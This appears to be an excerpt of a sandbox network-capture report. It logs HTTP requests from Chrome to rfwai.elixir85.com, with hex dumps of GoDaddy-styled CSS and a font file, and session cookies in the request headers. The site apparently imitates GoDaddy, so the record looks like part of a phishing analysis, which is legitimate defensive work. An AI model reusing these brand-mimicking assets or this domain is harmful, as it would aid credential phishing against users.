                                                        2024-07-03 19:07:21 UTC1369INData Raw: 66 74 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 30 7d 2e 61 6c 65 72 74 2d 65 72 72 6f 72 7b 63 6f 6c 6f 72 3a 23 65 38 31 31 32 33 7d 69 6e 70 75 74 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2b 6c 61 62 65 6c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 64 64 6f 6e 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 7d 2e 64 69 72 6c 74 72 7b 64 69 72 65 63 74 69 6f 6e 3a 6c 74 72 7d 2e 69 6e 70 75 74 2d 6d 61 78 2d 77 69 64 74 68 7b 6d 61 78 2d 77 69 64 74 68 3a 36 34 30 70 78 7d 2e 74 61 62 6c 65 2c 69 6e 70 75 74 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 6c 61 62 65 6c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 64 64 6f 6e 7b 62 6f 72 64 65 72 2d 77 69 64 74
                                                        Data Ascii: ft-radius:0;border-top-left-radius:0;border-left:0}.alert-error{color:#e81123}input.form-control+label.input-group-addon{border-radius:0}.dirltr{direction:ltr}.input-max-width{max-width:640px}.table,input{max-width:100%}label.input-group-addon{border-widt


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        51192.168.2.549783104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:20 UTC1361OUTGET /abjlZHFJHKoUOtpqyef30 HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:21 UTC633INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:21 GMT
                                                        Content-Type: text/css;charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Content-Disposition: inline; filename="abjlZHFJHKoUOtpqyef30"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XlKBW%2BJlz9iA0KoE5SaqFRuw3oN%2FRnJKcj103BjF1wcy6rgSBnyGQgb555QOKBG7k76ry3gq4tpxKT65ncsa6rovkqKqfapxsRpgHEyUai9HBSE7qhAoWJnFXsPC%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d9286c8ee17287-EWR
                                                        2024-07-03 19:07:21 UTC736INData Raw: 33 37 62 35 0d 0a 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 67 64 73 68 65 72 70 61 27 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 73 72 63 3a 20 75 72 6c 28 27 2f 74 65 73 74 77 65 62 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 62 6f 6c 64 2e 77 6f 66 66 32 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 2c 75 72 6c 28 27 2f 74 65 73 74 77 65 62 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 62 6f 6c 64 2e 77 6f 66 66 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 2d 31 30 46 46 46 46 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61
                                                        Data Ascii: 37b5@font-face{font-family: 'gdsherpa';font-weight: 700;src: url('/testweb/assets/fonts/GDSherpa-bold.woff2') format('woff2'),url('/testweb/assets/fonts/GDSherpa-bold.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-fa
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 6c 79 3a 20 27 67 64 73 68 65 72 70 61 27 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 31 20 39 30 30 3b 73 72 63 3a 20 75 72 6c 28 27 2f 74 65 73 74 77 65 62 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 76 66 32 2e 77 6f 66 66 32 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 2c 75 72 6c 28 27 2f 74 65 73 74 77 65 62 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 76 66 32 2e 77 6f 66 66 32 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 2d 76 61 72 69 61 74 69 6f 6e 73 27 29 3b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 2d 31 30 46 46 46 46 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 67 64 2d 73 61 67
                                                        Data Ascii: ly: 'gdsherpa';font-weight: 1 900;src: url('/testweb/assets/fonts/GDSherpa-vf2.woff2') format('woff2'),url('/testweb/assets/fonts/GDSherpa-vf2.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gd-sag
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 2d 75 78 2d 74 33 37 39 6f 76 2c 76 61 72 28 2d 2d 75 78 2d 6a 77 35 73 39 6a 2c 31 2e 35 29 29 20 2a 20 31 65 6d 20 2d 20 31 2e 35 65 6d 29 20 2f 20 32 29 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 76 61 72 28 2d 2d 75 78 2d 31 66 37 69 66 35 70 2c 75 6e 64 65 72 6c 69 6e 65 29 3b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 76 61 72 28 2d 2d 75 78 2d 31 66 37 69 66 35 70 2c 75 6e 64 65 72 6c 69 6e 65 29 3b 0d 0a 20 20 67 61 70 3a 20 30 2e 35 65 6d 3b 0d 0a 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0d 0a 20 20 2d 2d 75 78 2d 62 75 74 74 6f 6e 2d 69 63 6f 6e 2d 6d 61 72 67 69 6e 3a 20 63 61 6c 63 28 28 76 61 72 28 2d 2d 75 78 2d 74 33
                                                        Data Ascii: -ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2); padding: 0; text-decoration: var(--ux-1f7if5p,underline); -webkit-text-decoration: var(--ux-1f7if5p,underline); gap: 0.5em; cursor: pointer; --ux-button-icon-margin: calc((var(--ux-t3
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 0a 20 20 70 61 64 64 69 6e 67 2d 69 6e 6c 69 6e 65 3a 20 76 61 72 28 2d 2d 75 78 53 70 61 63 65 2d 2d 70 61 64 64 69 6e 67 2d 73 69 7a 65 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 73 70 61 63 65 2e 75 78 2d 73 70 61 63 65 2d 2d 62 6c 6f 63 6b 3a 65 6d 70 74 79 20 7b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 0d 0a 20 20 62 6c 6f 63 6b 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 75 78 53 70 61 63 65 2d 2d 70 61 64 64 69 6e 67 2d 73 69 7a 65 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 73 70 61 63 65 2e 75 78 2d 73 70 61 63 65 2d 2d 62 6c 6f 63 6b 3a 6e 6f 74 28 3a 65 6d 70 74 79 29 20 7b 0d 0a 20 20 70 61 64 64 69 6e 67 2d 62 6c 6f
                                                        Data Ascii: padding-inline: var(--uxSpace--padding-size);}#sections_godaddy .ux-space.ux-space--block:empty { display: inline-flex; block-size: var(--uxSpace--padding-size);}#sections_godaddy .ux-space.ux-space--block:not(:empty) { padding-blo
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 6f 6e 74 53 69 7a 65 31 29 20 76 61 72 28 2d 2d 75 78 2d 79 34 70 67 38 7a 2c 2a 29 20 76 61 72 28 2d 2d 75 78 2d 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 33 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 32 29 20 76 61 72 28 2d 2d 75 78 2d 79 34 70 67 38 7a 2c 2a 29 20 76 61 72 28 2d 2d 75 78 2d 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 34 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 33 29 20 76 61 72 28 2d 2d 75 78 2d 79 34 70 67 38 7a 2c 2a 29 20 76 61 72 28 2d 2d 75 78 2d 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d
                                                        Data Ascii: ontSize1) var(--ux-y4pg8z,*) var(--ux-7s4p3v,1.125)); --uxText--fontSize3: calc(var(--uxText--fontSize2) var(--ux-y4pg8z,*) var(--ux-7s4p3v,1.125)); --uxText--fontSize4: calc(var(--uxText--fontSize3) var(--ux-y4pg8z,*) var(--ux-7s4p3v,1.125)); --
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 61 6c 65 72 74 20 73 76 67 20 7b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 0d 0a 20 20 66 69 6c 6c 3a 20 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 74 65 78 74 2d 69 6e 70 75 74 2d 73 68 65 6c 6c 20 2e 75 78 2d 74 65 78 74 2d 63 61 70 74 69 6f 6e 20 7b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 36 70 78 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 33 70 78 3b 0d 0a 7d 0d 0a 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 66 69 65 6c 64 2d 66 72 61 6d 65 2e 75 78 2d 66 69 65 6c 64 2d 66 72 61 6d 65 2d 2d 69 6e 76 61 6c
                                                        Data Ascii: #sections_godaddy .ux-alert svg { color: currentColor; fill: currentColor;}#sections_godaddy .ux-text-input-shell .ux-text-caption { margin-top: 6px; font-size: 13px;}#sections_godaddy .ux-field-frame.ux-field-frame--inval
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 79 2d 63 6f 6e 74 65 6e 74 3a 20 66 6c 65 78 2d 65 6e 64 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 73 72 2d 6f 6e 6c 79 20 7b 0d 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 77 69 64 74 68 3a 20 31 70 78 3b 0d 0a 20 20 68 65 69 67 68 74 3a 20 31 70 78 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 63 6c 69 70 3a 20 72 65 63 74 28 30 2c 30 2c 30 2c 30 29 3b 0d 0a 20 20 63 6c 69 70 3a 20 72 65 63 74 28 30 2c 30 2c 30 2c 30 29 3b 0d 0a 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 63 6c 69 70 2d 70 61 74
                                                        Data Ascii: y-content: flex-end!important;}#sections_godaddy .sr-only { position: absolute; width: 1px; height: 1px; padding: 0; overflow: hidden; -webkit-clip: rect(0,0,0,0); clip: rect(0,0,0,0); white-space: nowrap; -webkit-clip-pat
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 69 6e 70 75 74 5b 74 79 70 65 3d 63 68 65 63 6b 62 6f 78 5d 20 7b 0d 0a 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2e 30 39 33 37 35 72 65 6d 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 38 70 78 3b 0d 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 38 70 78 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 63 6f 6e 74 61 69 6e 65
                                                        Data Ascii: input[type=checkbox] { box-sizing: border-box; padding: 0; vertical-align: .09375rem;}#sections_godaddy .container { margin-left: auto; margin-right: auto; padding-left: 8px; padding-right: 8px;}#sections_godaddy .containe
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 75 78 2d 31 6c 65 79 6e 73 6d 2c 23 30 30 30 29 3b 0d 0a 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 75 78 2d 39 37 68 33 76 6c 2c 23 64 33 64 33 64 33 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 63 61 72 64 20 2e 63 61 72 64 2d 62 6c 6f 63 6b 20 7b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 2d 31 73 62 66 69 67 38 2c 2e 32 35 72 65 6d 29 20 2a 20 35 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 66 6f 6e 74 2d 70 72 69 6d 61 72 79 2d 62 6f 6c 64 20 7b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 61 72 28 2d 2d 75 78 2d 31 30 36 37 70 68 39 2c 73 61 6e 73 2d
                                                        Data Ascii: olor: var(--ux-1leynsm,#000); border: 1px solid var(--ux-97h3vl,#d3d3d3);}#sections_godaddy .ux-card .card-block { padding: calc(var(--ux-1sbfig8,.25rem) * 5);}#sections_godaddy .font-primary-bold { font-family: var(--ux-1067ph9,sans-
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 69 76 65 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 75 78 2d 6f 37 6a 75 30 68 2c 76 61 72 28 2d 2d 75 78 2d 39 71 70 66 36 63 2c 23 30 30 66 29 29 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 75 78 2d 75 71 34 39 70 67 2c 76 61 72 28 2d 2d 75 78 2d 68 36 65 37 63 31 2c 23 66 66 66 29 29 3b 0d 0a 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 75 78 2d 34 68 76 6f 76 6e 2c 76 61 72 28 2d 2d 75 78 2d 31 78 6c 69 75 68 69 2c 74 72 61 6e 73 70 61 72 65 6e 74 29 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 62 75 74 74 6f 6e 2e 75 78 2d 62 75 74 74 6f 6e 2d 70 72 69 6d 61 72 79 20 7b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20
                                                        Data Ascii: ive { background-color: var(--ux-o7ju0h,var(--ux-9qpf6c,#00f)); color: var(--ux-uq49pg,var(--ux-h6e7c1,#fff)); border-color: var(--ux-4hvovn,var(--ux-1xliuhi,transparent));}#sections_godaddy .ux-button.ux-button-primary { color: #fff;


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        52192.168.2.549781104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:20 UTC1385OUTGET /pqC74CTJePSu4Ivyz37z7VePwx37 HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Origin: https://rfwai.elixir85.com
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: font
                                                        Referer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:21 UTC625INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:21 GMT
                                                        Content-Type: font/woff2
                                                        Content-Length: 28000
                                                        Connection: close
                                                        Content-Disposition: inline; filename="pqC74CTJePSu4Ivyz37z7VePwx37"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mfr8SWVeqO%2FoEpVBE%2FPjsd2icsuJOdV%2F49U5zsm3FgEbwjRRIZntyl1YU%2Fg7Lf8tXEPy5O3JgtL3g7HieKhZk3IjujgDQPCNb5wBgqOLdAccvLMzF46cmw4ywNGumA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d9286c897e43d4-EWR
                                                        2024-07-03 19:07:21 UTC744INData Raw: 77 4f 46 32 00 01 00 00 00 00 6d 60 00 10 00 00 00 01 24 08 00 00 6c fd 00 01 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 81 9d 36 1c 89 16 06 60 00 8e 3c 08 3c 09 97 62 11 08 0a 82 bb 24 82 9c 7f 01 36 02 24 03 8e 78 0b 87 3e 00 04 20 05 8c 03 07 97 7b 0c 81 0d 5b 09 10 71 05 6b b7 5d 5d 4f 88 db 06 10 73 b3 fd a9 7c 99 02 6e 8c 9b c7 21 18 d6 5b 3c 3b 10 83 ee e0 50 26 a6 cf 67 ff ff ff bf 21 a9 c8 98 49 27 69 b7 0d 51 01 44 50 d5 df 9f c4 1e 39 02 92 4a a0 06 b7 80 17 c1 39 47 eb 95 e9 98 51 31 28 8b f2 29 4a 6e c6 19 d5 d4 c5 d4 38 59 f3 d2 1b f9 1a 98 29 4a ce 46 0e 63 20 41 96 af 37 6b ab 76 b3 8b e9 32 3d a1 5a ee 6e fa 34 60 12 ed 81 a0 c0 7e 4e 6c a4 81 ef 34 3b aa 91 07 53 f6 6c 7b 77 c7 c7 3a ae 23 d5 ee aa 3d 21 bc 20
                                                        Data Ascii: wOF2m`$lB6`<<b$6$x> {[qk]]Os|n![<;P&g!I'iQDP9J9GQ1()Jn8Y)JFc A7kv2=Zn4`~Nl4;Sl{w:#=!
                                                        2024-07-03 19:07:21 UTC1369INData Raw: fb cf db e5 9f fb 06 4b 68 b0 50 00 7c 22 4d 93 ae 4a 51 a6 00 02 1a e0 df 3f 60 01 fc 53 40 7b df ed 6f 97 f6 52 6a 43 45 a1 71 78 8f 70 92 21 28 57 69 9f a4 1b eb 64 59 b5 25 ff 2f 72 f2 23 13 70 04 e7 43 20 15 c4 93 e2 e9 00 00 81 82 83 f3 72 1e 6f 34 50 f1 7d e4 e6 7f 33 58 92 99 5d 88 fc f3 a2 d4 ae 01 36 f2 9e 27 7e 26 b0 d3 c0 5d b7 b4 a7 2a 79 09 f4 8f b6 ff 59 51 82 a7 39 e1 22 76 b7 c3 17 cb 33 f0 af 90 a0 d9 6f 45 4d 51 6f 57 4d 16 57 60 cc 85 de 1f 9a 8a 01 13 c4 07 db cc a4 0e 94 94 10 82 59 08 56 81 8a 4f 32 11 7f ee f1 f8 f4 6c 83 02 c7 ac 9d 70 01 31 87 f4 42 a5 c2 bf 46 6e 0e 7f 6f 10 3c d0 ab a8 2c 43 8f f7 0f fd 97 f8 5e c0 59 e6 43 00 b6 fe 57 ae e9 b6 74 58 e2 11 7c a8 60 d2 a6 bc 97 35 3a f7 59 64 40 5d e5 12 6a 18 bb 24 b6 dc ca 76
                                                        Data Ascii: KhP|"MJQ?`S@{oRjCEqxp!(WidY%/r#pC ro4P}3X]6'~&]*yYQ9"v3oEMQoWMW`YVO2lp1BFno<,C^YCWtX|`5:Yd@]j$v
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 1a 4e 4a ad 68 65 68 64 9a cf 32 9d 4d e7 8a 0a 96 48 c8 6c 22 d8 b5 a2 1b ed 62 bc b1 36 52 21 05 95 14 c7 81 94 35 dc bc 61 7e c1 b4 7a 90 11 b4 ca 1d 10 b9 22 0a 08 40 c0 9b 31 90 dc 27 05 17 40 40 05 00 50 85 55 b6 46 4e 76 17 a1 cf f8 91 28 18 bc 86 dd 28 8a 0d 6e 1d 26 6e 7d 95 e8 90 58 8c 91 02 38 4a a0 94 87 e5 5a 50 e2 4c bc d0 25 06 2b 80 8c c4 05 99 9c 71 86 d8 29 ca 83 fb a6 88 8f df 77 45 f5 08 aa 72 b3 dd 04 90 49 e7 01 a0 73 40 15 14 14 29 cb f1 82 58 04 82 31 5a 02 29 dc 92 31 91 53 51 02 a6 fa 29 2a 80 d8 45 b8 e5 49 0f 90 d8 00 4a f9 09 a8 6e 75 4c 81 89 2f 00 77 7d b0 d2 75 b4 ea 9a ae 67 98 3e 3c 14 be 13 55 48 55 f9 1e 60 2e ed fc 69 cf da b5 42 06 20 96 20 07 60 a8 05 c2 4c f9 e3 9b e0 38 ab d1 83 9b 3a 8b 85 5e ca a3 dc 75 85 2b e0
                                                        Data Ascii: NJhehd2MHl"b6R!5a~z"@1'@@PUFNv((n&n}X8JZPL%+q)wErIs@)X1Z)1SQ)*EIJnuL/w}ug><UHU`.iB `L8:^u+
                                                        2024-07-03 19:07:21 UTC1369INData Raw: 84 2f 8d 21 bc 9b c0 9e 39 aa 76 68 dd 8c 5b 2f 6b 9f 1d b3 c9 cf 85 80 7e 4d 7d 1c 44 b5 56 8e d5 c6 7d 25 c4 02 3b 1b 15 6b 50 8d 7e cb ba 24 26 a5 bb 63 d1 11 53 27 2b df 09 8c 31 2c f4 05 2d 8e 9d 58 08 42 45 de 45 e3 4e a2 83 07 5d cd 4a 33 e0 b5 97 e1 ae c5 ad d6 f0 84 e2 b0 3c c6 03 e7 41 3f 7a 78 70 cc 8c 76 2e 02 cf b0 85 b1 bb 8b 6f c8 80 02 d5 9e 4a 0a a0 e3 4b b7 9b 9f c2 a6 10 af 98 9a 67 7a 8f e4 ad 45 d1 58 cc 2e ad 55 97 e2 39 c3 32 ea cd 24 ff 27 7b 73 5b b5 87 25 e3 73 aa 4d 39 f0 18 1c e6 1b 82 af d3 ba d2 3c 76 ce 79 bf b0 50 9d c3 58 69 34 3f af 43 4d 37 3b 6c 0d ce 6f 77 95 ec 53 d8 54 86 b1 6d 91 2a 74 76 a0 4a b1 bf 18 8f 94 7e cf d7 cf f4 a0 5e 55 14 0e 79 da 72 32 2d 41 57 0e 69 b4 3f 77 7c c5 7f e3 8f 3f 86 9b ff 3b dd 9e 48 b6
                                                        Data Ascii: /!9vh[/k~M}DV}%;kP~$&cS'+1,-XBEEN]J3<A?zxpv.oJKgzEX.U92$'{s[%sM9<vyPXi4?CM7;lowSTm*tvJ~^Uyr2-AWi?w|?;H
